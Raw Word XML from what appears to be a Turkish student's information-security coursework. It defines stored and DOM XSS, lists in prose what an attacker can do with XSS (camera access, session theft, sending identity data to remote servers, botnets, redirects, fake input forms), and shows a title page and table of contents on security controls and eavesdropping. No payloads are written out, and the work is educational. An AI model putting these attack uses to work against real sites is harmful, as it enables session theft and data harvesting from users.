        <w:jc w:val="both"/>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t>Stored/Persistent XSS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Adında anlaşılacağı üzere kalıcı XSS türüdür.Bu sefer girilen payloadlar anlık olarak yansımaz bir veritabanına yada başka bir yere kayıt edilir daha sonradan ziyaret edildiğinde çalışan XSS çeşitidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="450"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Dom XSS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Dom (Document Object Model) XSS Dom lardan kaynaklanan XSS dir.Gemelde # işaretinden sonra payload denenmesi ve sayfa yenilendiğinde alert alındığında DOM XSS var denilen XSS açıklığıdır.İşin teorik bilgisi DOM nesnesinden kaynaklandığı için en tehlikeli XSS türü olarak anılmaktadır</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Xss ile Neler Yapılabilir ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1-) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JavaScript ile;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Şahısın kamerası ile oynanabilir, görüntü alınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ajax sayesinde kullanıcı kimliği uzak sunucularda ki dosyalara kaydedilebilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Botnet ağı kurulabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Oturum bilgileri alınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2-)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML ile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sayfa yönlendirmesi yapılabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fake inputlar ile veri toplanabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sayfalara yönlendirilip veri alınabilir.</w:t>
      </w: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r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kaynakça</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://gurelahmet.com/xsscross-site-scripting-nedir-ve-xss-lab-uygulamas%C4%B1-web-for-pentester/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://kodedu.com/2014/07/xss-aciklarina-karsisanitize-islemi/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://www.berkgoksel.com/2016/09/web-uygulamas-guvenligi-cross-site_30.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://www.turkhackteam.org/web-server-guvenligi/1669696-xss-nedir-cesitleri-nelerdir-teorina.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005112F4" w:rsidRDefault="005112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Pr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="cente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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C23A644" wp14:editId="5EAE710B">
            <wp:extent cx="3048000" cy="2702561"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>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7" b="6167"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3062983" cy="2715846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Gamze DÜZENLİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>120757031</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BMS-302 Bilgisayar-Bilgi Güvenliği ve Yönetimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pP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8"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Prof.Dr. Abdulsamet HAŞILOĞLU</w:t>
      </w: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8C0BEE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Section 1.2.1-1.2.2</w:t>
      </w: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İÇİNDEKİLER</w:t>
      </w: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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GİRİŞ……………………………………………………………………………………………………1</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BİLGİ GÜVENLİĞİ KONTROL TÜRLERİ………………………………………………………...1</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rPr>
        <w:t>FİZİKSEL KONTROLLER…………………………………………………………………………...1</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Önleyici Fiziksel Kontroller…………………………………………………………………………....2</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Dedektif Fiziksel Kontroller……………………………………………………………………………3</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TEKNİK KONTROLLER……………………………………………………………………………..4</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Önleyici Teknik Kontroller………………………………………………………………………….....4</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Dedektif Teknik Kontroller…………………………………………………………………………….5</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İDARİ KONTROLLER………………………………………………………………………………..5</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Önleyici İdari Kontroller………………………………………………………………………………5</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Dedektif İdari Kontroller………………………………………………………………………………7</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TEKNOLOJİ VE GİZLİLİK ÇATIŞTIĞINDA……………………………………………………..9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Şifreleme ve Gizli Mesajlar…………………………………………………………………………….9</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mevcut Mevzuat………………………………………………………………………………………...10</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rPr>
        <w:t>Gizlilik Hakları………………………………………………………………………………………….10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Veri Şifreleme Standardı……………………………………………………………………………….11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Clipper Tartışması………………………………………………………………………………………11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pP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eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>AVESDROPPİNG NEDİR?..................................................................................................................12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Aktif Eavesdropping Saldırısı…………………………………………………………………………..12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Pasif Eavesdropping Saldırısı…………………………………………………………………………...13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pP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eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Wireshark ile Pasif Eavesdropping……………………………………………………………………..13</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eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Eavesdropping Saldırılarından Nasıl Korunulmalıdır?.........................................................................13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
